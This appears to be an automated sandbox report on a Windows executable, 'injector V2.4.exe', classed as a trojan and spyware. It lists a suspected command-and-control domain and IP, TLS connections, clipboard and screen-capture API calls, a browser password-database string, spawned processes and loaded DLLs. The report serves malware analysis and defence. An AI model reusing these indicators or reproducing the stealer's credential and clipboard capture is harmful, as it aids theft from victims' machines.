Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: injector V2.4.exe, injector V2.4.exe, 00000004.00000003.2122997963.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2122845833.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241547764.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123114421.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182661370.000000000053A000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254179791.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/
Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/#
Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/3
Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/K
Source: injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/api
Source: injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/api;
Source: injector V2.4.exe, 00000004.00000003.2241600983.0000000000544000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/apiM
Source: injector V2.4.exe, 00000004.00000003.2175491953.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/apiY
Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/apig
Source: injector V2.4.exe, 00000004.00000003.2150145038.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2147305126.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2145295992.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/apik
Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/apiq
Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou/s
Source: injector V2.4.exe, injector V2.4.exe, 00000004.00000002.2254882908.0000000000536000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2203550234.000000000052F000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182688181.0000000000533000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou:443/api
Source: injector V2.4.exe, 00000004.00000002.2254923759.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou:443/apiTlZT
Source: injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fumblingactor.cyou:443/apiicrosoft
Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: injector V2.4.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_00434830 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_00434830

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_00434830 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_00434830

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_00434A10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

4_2_00434A10

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B3D4A0	0_2_00B3D4A0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B44CD0	0_2_00B44CD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B46CD0	0_2_00B46CD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B34CC0	0_2_00B34CC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B46800	0_2_00B46800
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B33440	0_2_00B33440
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B47840	0_2_00B47840
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B355F0	0_2_00B355F0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B25930	0_2_00B25930
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B41D30	0_2_00B41D30
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B38129	0_2_00B38129
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B34910	0_2_00B34910
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B3DD00	0_2_00B3DD00
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B44170	0_2_00B44170
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2B964	0_2_00B2B964
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B32AE7	0_2_00B32AE7
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B55E22	0_2_00B55E22
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B39B80	0_2_00B39B80
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B33F80	0_2_00B33F80
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B36330	0_2_00B36330
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B47330	0_2_00B47330
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B35F60	0_2_00B35F60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B41367	0_2_00B41367
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2A36B	0_2_00B2A36B
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B37F54	0_2_00B37F54
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B3F340	0_2_00B3F340
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B3C0A0	3_2_00B3C0A0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B21000	3_2_00B21000
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B46800	3_2_00B46800
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B47840	3_2_00B47840
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B30190	3_2_00B30190
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2A180	3_2_00B2A180
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B25930	3_2_00B25930
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B34910	3_2_00B34910
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B44170	3_2_00B44170
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B39B80	3_2_00B39B80
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B37BD0	3_2_00B37BD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B36330	3_2_00B36330
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B47330	3_2_00B47330
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B3F340	3_2_00B3F340
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B3D4A0	3_2_00B3D4A0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B44CD0	3_2_00B44CD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B46CD0	3_2_00B46CD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B34CC0	3_2_00B34CC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B33440	3_2_00B33440
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B355F0	3_2_00B355F0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B25540	3_2_00B25540
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B55E22	3_2_00B55E22
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B3DE70	3_2_00B3DE70
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B23E60	3_2_00B23E60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B33F80	3_2_00B33F80
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B35F60	3_2_00B35F60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00423920	4_2_00423920
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00439130	4_2_00439130
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00421400	4_2_00421400
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041941E	4_2_0041941E
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004394C0	4_2_004394C0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042E573	4_2_0042E573
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0043BD00	4_2_0043BD00
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00408D80	4_2_00408D80
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00425655	4_2_00425655
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00441620	4_2_00441620
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0040CE25	4_2_0040CE25
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0040DE2F	4_2_0040DE2F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042EED9	4_2_0042EED9
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00428690	4_2_00428690
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00441EA0	4_2_00441EA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041B87A	4_2_0041B87A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00402820	4_2_00402820
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042A820	4_2_0042A820
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00429828	4_2_00429828
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041C03D	4_2_0041C03D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041F0CA	4_2_0041F0CA
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004418D0	4_2_004418D0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00405095	4_2_00405095
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004388A0	4_2_004388A0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0043A170	4_2_0043A170
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041D1D0	4_2_0041D1D0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042E986	4_2_0042E986
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00432990	4_2_00432990
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004269B1	4_2_004269B1
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042A24C	4_2_0042A24C
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00407A50	4_2_00407A50
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00424A6F	4_2_00424A6F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00429230	4_2_00429230
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004272DE	4_2_004272DE
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042DAF9	4_2_0042DAF9
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042A299	4_2_0042A299
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042B2A1	4_2_0042B2A1
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00406AB0	4_2_00406AB0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00437B53	4_2_00437B53
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00438B00	4_2_00438B00
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041AB13	4_2_0041AB13
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00428B20	4_2_00428B20
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041E330	4_2_0041E330
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00402BD0	4_2_00402BD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004063E0	4_2_004063E0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00409B90	4_2_00409B90
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00441BB0	4_2_00441BB0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041A45E	4_2_0041A45E
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00439C60	4_2_00439C60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0043C460	4_2_0043C460
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0043CC70	4_2_0043CC70
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00420400	4_2_00420400
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00434420	4_2_00434420
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00440420	4_2_00440420
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00424430	4_2_00424430
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042A4D0	4_2_0042A4D0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042F54D	4_2_0042F54D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004272DE	4_2_004272DE
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004035E0	4_2_004035E0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004295E4	4_2_004295E4
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042B5F0	4_2_0042B5F0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00404D85	4_2_00404D85
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0040B5BC	4_2_0040B5BC
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042A643	4_2_0042A643
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00427E47	4_2_00427E47
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041FE60	4_2_0041FE60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042DE02	4_2_0042DE02
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_004096C0	4_2_004096C0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00421ECE	4_2_00421ECE
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00430ED9	4_2_00430ED9
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00405E90	4_2_00405E90
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0042DE92	4_2_0042DE92
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00418EB0	4_2_00418EB0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00406F40	4_2_00406F40
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0040AF50	4_2_0040AF50
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_00403FD0	4_2_00403FD0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_2_0041F7B0	4_2_0041F7B0

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: String function: 00418EA0 appears 73 times
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: String function: 00B4CAF8 appears 35 times
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: String function: 00B49890 appears 63 times
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: String function: 00408620 appears 41 times

Source: injector V2.4.exe

Static PE information: invalid certificate

Source: injector V2.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: injector V2.4.exe

Static PE information: Section: .coS ZLIB complexity 1.0003350020226538

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/0@1/1

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_004394C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_004394C0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03

Source: injector V2.4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\injector V2.4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: injector V2.4.exe, 00000004.00000003.2102318883.0000000004E86000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102563242.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123788474.0000000004F02000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123574593.0000000004E6D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: injector V2.4.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\injector V2.4.exe

File read: C:\Users\user\Desktop\injector V2.4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"	Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: profapi.dll	Jump to behavior
